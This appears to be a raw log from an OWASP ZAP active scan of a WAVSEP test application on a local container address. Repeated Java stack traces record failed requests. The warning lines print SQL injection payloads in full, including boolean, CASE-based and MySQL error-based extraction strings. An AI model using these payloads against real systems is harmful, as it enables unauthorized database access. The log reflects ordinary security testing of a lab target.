org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680214 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 9311=3605 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 9311=3605 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680215 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 2536=8987-- IGHZ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 2536=8987-- IGHZ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680217 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 3169=3169-- JSQk] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 3169=3169-- JSQk at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680217 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 2536=8987-- IGHZ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 2536=8987-- IGHZ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680219 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (4488=4206) THEN 4488 ELSE 4488*(SELECT 4488 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (4488=4206) THEN 4488 ELSE 4488*(SELECT 4488 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680220 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (7766=7766) THEN 7766 ELSE 7766*(SELECT 7766 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (7766=7766) THEN 7766 ELSE 7766*(SELECT 7766 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680222 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (4488=4206) THEN 4488 ELSE 4488*(SELECT 4488 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (4488=4206) THEN 4488 ELSE 4488*(SELECT 4488 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680224 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND (SELECT 4196 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4196=4196,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1399=1399] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND (SELECT 4196 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4196=4196,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1399=1399 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680225 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT 4052 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4052=4052,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND (SELECT 4052 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4052=4052,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680226 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND (SELECT 7372 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7372=7372,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QObs'='QObs] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND (SELECT 7372 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7372=7372,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QObs'='QObs at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680228 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND (SELECT 1814 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1814=1814,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cCxW'='cCxW] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND (SELECT 1814 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1814=1814,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cCxW'='cCxW at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680230 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND (SELECT 9682 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9682=9682,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND (SELECT 9682 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9682=9682,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680231 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT 5257 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5257=5257,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- eRNi] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND (SELECT 5257 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5257=5257,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- eRNi at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown 